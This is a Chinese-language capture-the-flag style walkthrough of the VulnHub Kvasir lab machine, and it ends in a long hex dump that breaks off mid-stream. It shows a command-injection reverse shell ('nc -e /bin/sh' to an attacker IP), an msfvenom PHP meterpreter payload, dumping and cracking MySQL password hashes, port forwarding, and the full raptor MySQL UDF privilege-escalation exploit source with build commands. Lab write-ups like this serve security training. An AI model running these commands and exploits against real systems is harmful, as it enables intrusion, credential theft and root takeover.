Kvasir

下载地址

     https://download.vulnhub.com/kvasir/kvasir1.tar

实战演练

查找靶机IP

扫描靶机开放端口

这个靶机只开放了80端口，浏览器打开80端口

遇见输入框第一次时间就要看有没有SQL注入

看到上面这个回显，sqlmap跑起，发现403错误

还有一个页面，注册一个账号

发现没有什么东西

现在没有线索可以搞，扫描一下目录，找到login.php，不过测试302跳转了

使用bp显示数据包的response

修改状态码为200

页面显示出来了

修改状态码为200

这个输入框存在命令注入漏洞

nc反弹

      apache2; nc -e /bin/sh 192.168.0.106 4444 #

查看页面的源代码

cat login.php
<?php

$username = $_POST["username"];
$password = $_POST["password"];

mysql_connect("192.168.2.200", "webapp", "webapp") or die(mysql_error());
mysql_select_db("webapp") or die(mysql_error());

$query = "SELECT * FROM users where username='$username' AND password='$password'";
$result = mysql_query($query) or die(mysql_error());

	if (mysql_num_rows($result) == 1) {

		$row = mysql_fetch_array($result);

		session_start();
		$_SESSION["username"] = $username;

			if ($row["admin"] == 1) {
				$_SESSION["admin"] = 1;
				setcookie(time()+600);
				header ("Location: admin.php");
			}

			elseif ($row["admin"] == 0) {
				$_SESSION["member"] = 1;
				setcookie(time()+600);
				header ("Location: member.php");
			}
		}

	else

		header ("Location: index.php?fail=1");

?>

看来有两张网卡

使用数据库进行操作

#查看授权
mysql -uwebapp -pwebapp -h 192.168.2.200 -e 'show grants;'
Grants for webapp@192.168.2.100
GRANT SELECT, INSERT ON *.* TO 'webapp'@'192.168.2.100' IDENTIFIED BY PASSWORD '*BF7C27E734F86F28A9386E9759D238AFB863BDE3'
GRANT ALL PRIVILEGES ON `webapp`.* TO 'webapp'@'192.168.2.100'
#查看数据表
mysql -uwebapp -pwebapp -h 192.168.2.200 -e 'use webapp; show tables;'
Tables_in_webapp
todo
users
#查看todo表内容
mysql -uwebapp -pwebapp -h 192.168.2.200 -e 'use webapp; select * from todo;'
task
stop running mysql as root

一个名为todo存在的表，带有一个字符串stop running mysql as root。那是第一个提示，我立刻想到了MySQL UDF，它可以使我们运行系统命令。但是，为了加载UDF，我需要一个dba级别的帐户，我还没有这个帐户。从先前的Grants输出中，可以看到我可以查询数据库服务器上的任何表，因此让我们获取一些管理哈希：

mysql -uwebapp -pwebapp -h 192.168.2.200 -e 'use mysql; select DISTINCT User,Password from user;'
User	Password
root	*ECB01D78C2FBEE997EDA584C647183FD99C115FD
debian-sys-maint	*E0E0871376896664A590151D348CCE9AA800435B
webapp	*BF7C27E734F86F28A9386E9759D238AFB863BDE3

接下来破解一下mysql密码,coolwater

来到这一步，发现这个命令执行漏洞的nc反弹好麻烦，于是我使用kali自带的反弹shell

root@kali:/tmp# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.106 LPORT=4444 -f raw > shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30656 bytes

使用nc传送shell.php

root@kali:/tmp# cat shell.php | nc -lvp 12345
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::12345
Ncat: Listening on 0.0.0.0:12345
Ncat: Connection from 192.168.0.104.
Ncat: Connection from 192.168.0.104:57056.

使用msf进行反弹连接

设置端口转发，本地连接数据库

meterpreter > portfwd add -l 3306 -p 3306 -r 192.168.2.200
[*] Local TCP relay created: :3306 <-> 192.168.2.200:3306

现在就可以连接上数据库了

查看文件

看来权限不够

如果您有一个mysql以root用户身份运行的目标，并且对目标mysql实例具有足够的特权，则可以通过编译和加载恶意库来提升命令执行的效率。

exp

#include <stdio.h>
#include <stdlib.h>

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
unsigned int arg_count; // number of arguments
enum Item_result *arg_type; // pointer to item_result
char **args; // pointer to arguments
unsigned long *lengths; // length of string args
char *maybe_null; // 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
char maybe_null; // 1 if func can return NULL
unsigned int decimals; // for real functions
unsigned long max_length; // for string functions
char *ptr; // free ptr for func data
char const_item; // 0 if result is constant
} UDF_INIT;

int do_cmd(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
if (args->arg_count != 1)
return(0);

system(args->args[0]);

return(0);
}

char do_cmd_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
return(0);
}

接下来，我们来编译库

root@kali:/tmp# vim raptor.c
root@kali:/tmp# gcc -fPIC -g -c raptor.c
root@kali:/tmp# gcc -g -shared -Wl,-soname,raptor.so -o raptor.so raptor.o -lc

用以下命令将文件的内容编码为十六进制

root@kali:/tmp# xxd -p -c `stat --format="%s" raptor.so` raptor.so
7f454c4602010100000000000000000003003e000100000050100000000000004000000000000000584200000000000000000000400038000900400020001f000100000004000000000000000000000000000000000000000000000000000000c804000000000000c804000000000000001000000000000001000000050000000010000000000000001000000000000000100000000000006901000000000000690100000000000000100000000000000100000004000000002000000000000000200000000000000020000000000000cc00000000000000cc0000000000000000100000000000000100000006000000002e000000000000003e000000000000003e0000000000002802000000000000300200000000000000100000000000000200000006000000102e000000000000103e000000000000103e000000000000d001000000000000d0010000000000000800000000000000040000000400000038020000000000003802000000000000380200000000000024000000000000002400000000000000040000000000000050e57464040000000020000000000000002000000000000000200000000000002c000000000000002c00000000000000040000000000000051e574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000052e5746404000000002e000000000000003e000000000000003e000000000000000200000000000000020000000000000100000000000000040000001400000003000000474e55005e9d8663bf7886522a23711229527f095019b37a0000000002000000060000000100000006000000000000400008005006000000070000009f0f9b122b4f31f90000000000000000000000000000000000000000000000001000000020000000000000000000000000000000000000005c00000012000000000000000000000000000000000000000100000020000000000000000000000000000000000000002c00000020000000000000000000000000000000000000004600000022000000000000000000000000000000000000006300000012000c00491100000000000017000000000000005500000012000c0005110000000000004400000000000000005f5f676d6f6e5f73746172745f5f005f49544d5f64657265676973746572544d436c6f6e655461626c65005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a6500646f5f636d640073797374656d00646f5f636d645f696e6974006c6962632e736f2e3600726170746f722e736f00474c4942435f322e322e35000000000000020000000000020001000100010001006f0000001000000000000000751a6909000002008300000000000000003e00000000000008000000000000000011000000000000083e0000000000000800000000000000c010000000000000204000000000000008000000000000002040000000000000e03f00000000000006000000010000000000000000000000e83f00000000000006000000030000000000000000000000f03f00000000000006000000040000000000000000000000f83f00000000000006000000050000000000000000000000184000000000000007000000020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004883ec08488b05dd2f00004885c07402ffd04883c408c3000000000000000000ff35e22f0000ff25e42f00000f1f4000ff25e22f00006800000000e9e0ffffffff25b22f000066900000000000000000488d3dd12f0000488d05ca2f00004839f87415488b05762f00004885c07409ffe00f1f8000000000c30f1f8000000000488d3da12f0000488d359a2f00004829fe48c1fe034889f048c1e83f4801c648d1fe7414488b05452f00004885c07408ffe0660f1f440000c30f1f8000000000803d612f000000752f5548833d262f0000004889e5740c488b3d422f0000e85dffffffe868ffffffc605392f0000015dc30f1f8000000000c30f1f8000000000e97bffffff554889e54883ec2048897df8488975f0488955e848894de0488b45f08b0083f8017407b800000000eb18488b45f0488b4010488b004889c7e8eefeffffb800000000c9c3554889e548897df8488975f0488955e8b8000000005dc34883ec084883c408c3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011b033b2c0000000400000020f0ffff4800000040f0ffff7000000005f1ffff8800000049f1ffffa8000000000000001400000000000000017a5200017810011b0c070890010000240000001c000000d0efffff20000000000e10460e184a0f0b770880003f1a3b2a332422000000001400000044000000c8efffff0800000000000000000000001c0000005c00000075f0ffff4400000000410e108602430d067f0c07080000001c0000007c00000099f0ffff1700000000410e108602430d06520c07080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000000000c01000000000000001000000000000006f000000000000000e0000000000000079000000000000000c0000000000000000100000000000000d0000000000000060110000000000001900000000000000003e0000000000001b0000000000000008000000000000001a00000000000000083e0000000000001c000000000000000800000000000000f5feff6f00000000600200000000000005000000000000004803000000000000060000000000000088020000000000000a000000000000008f000000000000000b0000000000000018000000000000000300000000000000004000000000000002000000000000001800000000000000140000000000000007000000000000001700000000000000b004000000000000070000000000000008040000000000000800000000000000a80000000000000009000000000000001800000000000000feffff6f00000000e803000000000000ffffff6f000000000100000000000000f0ffff6f00000000d803000000000000f9ffff6f00000000030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000103e00000000000000000000000000000000000000000000361000000000000020400000000000004743433a202844656269616e20382e332e302d362920382e332e30002c00000002000000000008000000000005110000000000005b0000000000000000000000000000000000000000000000970400000400000000000801450100000c6a020000bd02000005110000000000005b0000000000000000000000022500000002d8173900000003080751000000030407560000000408030108ed01000003020705010000030106ef010000030205fb010000050405696e74000308057100000002090000000396196c000000026002000003971b6c000000060891000000030106f6010000079100000008b3010000d8043108240200000999000000043307650000000009110000000436098b00000008098c0000000437098b0000001009730200000438098b0000001809f30200000439098b0000002009ee000000043a098b000000280992010000043b098b00000030093f000000043c098b0000003809a0000000043d098b0000004009230100000440098b0000004809c20200000441098b0000005009810200000442098b0000005809e40100000444163d02000060091e0000000446144302000068098400000004480765000000700937010000044907650000007409c4000000044a0b730000007809ac000000044d125000000080092c020000044e0f5700000082092c000000044f084902000083093101000004510f590200008809c800000004590d7f0000009009bb000000045b1764020000980908020000045c196f020000a009d2020000045d1443020000a809e1000000045e0947000000b0099a020000045f0a2d000000b8093f01000004600765000000c009a102000004620875020000c40002b70100000507199d0000000aa8010000042b0e0bd000000006083802000006089d0000000c91000000590200000d3900000000000608300200000bb800000006085f0200000b0502000006086a0200000c91000000850200000d3900000013000edb00000006890e910200000608240200000e79010000068a0e910200000eaa020000068b0e910200000efc000000071a0c650000000cd1020000c60200000f0007bb02000006089800000007cb0200000ed1010000071b1ac60200000308056c0000000308074c00000010020300000704400000000104061b03000011130200000011b102000001118001000002115502000003000841020000280106106a030000097a00000001070e400000000009360000000108136a030000080948020000010908700300001009e0020000010a1076030000180918010000010b078b00000020000608f002000006088b0000000608390000000200000000010c031b030000088e02000020010e10d70300000918010000010f06910000000009bc01000001100e400000000409e802000001110f390000000812707472000112078b00000010092102000001130691000000180002630000000114038803000013c50100000120069100000049110000000000001700000000000000019c33040000148b01000001201c33040000029168144802000001202e3904000002916014a001000001203a8b000000029158000608d703000006087c03000015dd0100000116056500000005110000000000004400000000000000019c148b01000001161633040000029168144802000001162839040000029160144d0200000116348b000000029158143b0200000116438b0000000291500000011101250e130b030e1b0e1101120710170000021600030e3a0b3b0b390b491300000324000b0b3e0b030e0000040f000b0b00000524000b0b3e0b03080000060f000b0b4913000007260049130000081301030e0b0b3a0b3b0b390b01130000090d00030e3a0b3b0b390b4913380b00000a1600030e3a0b3b0b390b00000b1300030e3c1900000c01014913011300000d210049132f0b00000e3400030e3a0b3b0b390b49133f193c1900000f21000000100401030e3e0b0b0b49133a0b3b0b390b01130000112800030e1c0b0000120d0003083a0b3b0b390b4913380b0000132e013f19030e3a0b3b0b390b2719491311011207401897421901130000140500030e3a0b3b0b390b491302180000152e013f19030e3a0b3b0b390b27194913110112074018964219000000260100000200ee0000000101fb0e0d0001010101000000010000012f7573722f6c69622f6763632f7838365f36342d6c696e75782d676e752f382f696e636c756465002f7573722f696e636c7564652f7838365f36342d6c696e75782d676e752f62697473002f7573722f696e636c7564652f7838365f36342d6c696e75782d676e752f626974732f7479706573002f7573722f696e636c7564650000726170746f722e63000000007374646465662e680001000074797065732e68000200007374727563745f46494c452e680003000046494c452e6800030000737464696f2e68000400007379735f6572726c6973742e6800020000000501000902051100000000000003160105090875050466050759050c760501820507ae050159310507f305015902020001015544465f41524753005f5f6f66665f74005f494f5f726561645f707472005f636861696e0073697a655f74005f73686f7274627566006172675f74797065005f494f5f6275665f62617365006c6f6e67206c6f6e6720756e7369676e656420696e74005544465f494e4954006c6f6e67206c6f6e6720696e74006172675f636f756e74005f66696c656e6f005f494f5f726561645f656e64005f666c616773005f494f5f6275665f656e64005f6375725f636f6c756d6e005f494f5f636f6465637674005f6f6c645f6f6666736574005f494f5f6d61726b657200737464696e005f667265657265735f627566005f494f5f77726974655f707472007379735f6e6572720073686f727420756e7369676e656420696e74006d617962655f6e756c6c005f494f5f736176655f62617365005f6c6f636b005f666c61677332005f6d6f646500474e552043313720382e332e30202d6d74756e653d67656e65726963202d6d617263683d7838362d3634202d67202d66504943007374646f757400494e545f524553554c5400696e69746964005f494f5f77726974655f656e64006d657373616765005f494f5f6c6f636b5f74005f494f5f46494c4500646563696d616c7300646f5f636d645f696e6974007379735f6572726c69737400646f5f636d64005f6d61726b65727300756e7369676e656420636861720073686f727420696e74005f494f5f776964655f6461746100535452494e475f524553554c5400636f6e73745f6974656d005f767461626c655f6f6666736574006572726f720073745f7564665f617267730069735f6e756c6c00524f575f524553554c54005f5f6f666636345f7400726170746f722e63005f494f5f726561645f62617365005f494f5f736176655f656e640073745f7564665f696e6974005f5f70616435005f756e757365643200737464657272005245414c5f524553554c54002f746d70005f494f5f6261636b75705f62617365005f667265657265735f6c697374006c656e67746873006d61785f6c656e677468005f494f5f77726974655f62617365004974656d5f726573756c740000000000000000000000000000000000000000000000000000000000000000000003000100380200000000000000000000000000000000000003000200600200000000000000000000000000000000000003000300880200000000000000000000000000000000000003000400480300000000000000000000000000000000000003000500d80300000000000000000000000000000000000003000600e80300000000000000000000000000000000000003000700080400000000000000000000000000000000000003000800b00400000000000000000000000000000000000003000900001000000000000000000000000000000000000003000a00201000000000000000000000000000000000000003000b00401000000000000000000000000000000000000003000c00501000000000000000000000000000000000000003000d00601100000000000000000000000000000000000003000e00002000000000000000000000000000000000000003000f00302000000000000000000000000000000000000003001000003e00000000000000000000000000000000000003001100083e00000000000000000000000000000000000003001200103e00000000000000000000000000000000000003001300e03f00000000000000000000000000000000000003001400004000000000000000000000000000000000000003001500204000000000000000000000000000000000000003001600284000000000000000000000000000000000000003001700000000000000000000000000000000000000000003001800000000000000000000000000000000000000000003001900000000000000000000000000000000000000000003001a00000000000000000000000000000000000000000003001b00000000000000000000000000000000000000000003001c0000000000000000000000000000000000010000000400f1ff000000000000000000000000000000000c00000002000c00501000000000000000000000000000000e00000002000c00801000000000000000000000000000002100000002000c00c01000000000000000000000000000003700000001001600284000000000000001000000000000004600000001001100083e00000000000000000000000000006d00000002000c00001100000000000000000000000000007900000001001000003e0000000000000000000000000000980000000400f1ff00000000000000000000000000000000010000000400f1ff00000000000000000000000000000000a100000001000f00c8200000000000000000000000000000000000000400f1ff00000000000000000000000000000000af00000002000d0060110000000000000000000000000000***000000100150020400000000000000000000000000000c200000001001200103e0000000000000000000000000000cb00000000000e0000200000000000000000000000000000de0000000100150028400000000000000000000000000000ea00000001001400004000000000000000000000000000003601000002000900001000000000000000000000000000000001000020000000000000000000000000000000000000001c01000012000000000000000000000000000000000000003001000012000c00491100000000000017000000000000003c01000020000000000000000000000000000000000000004b01000012000c00051100000000000044000000000000005201000020000000000000000000000000000000000000006c01000022000000000000000000000000000000000000000063727473747566662e6300646572656769737465725f746d5f636c6f6e6573005f5f646f5f676c6f62616c5f64746f72735f61757800636f6d706c657465642e37333235005f5f646f5f676c6f62616c5f64746f72735f6175785f66696e695f61727261795f656e747279006672616d655f64756d6d79005f5f6672616d655f64756d6d795f696e69745f61727261795f656e74727900726170746f722e63005f5f4652414d455f454e445f5f005f66696e69005f5f64736f5f68616e646c65005f44594e414d4943005f5f474e555f45485f4652414d455f484452005f5f544d435f454e445f5f005f474c4f42414c5f4f46465345545f5441424c455f005f49544d5f64657265676973746572544d436c6f6e655461626c650073797374656d4040474c4942435f322e322e3500646f5f636d645f696e6974005f5f676d6f6e5f73746172745f5f00646f5f636d64005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a654040474c4942435f322e322e3500002e73796d746162002e737472746162002e7368737472746162002e6e6f74652e676e752e6275696c642d6964002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e706c742e676f74002e74657874002e66696e69002e65685f6672616d655f686472002e65685f6672616d65002e696e69745f6172726179002e66696e695f6172726179002e64796e616d6963002e676f742e706c74002e64617461002e627373002e636f6d6d656e74002e64656275675f6172616e676573002e64656275675f696e666f002e64656275675f616262726576002e64656275675f6c696e65002e64656275675f7374720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001b0000000700000002000000000000003802000000000000380200000000000024000000000000000000000000000000040000000000000000000000000000002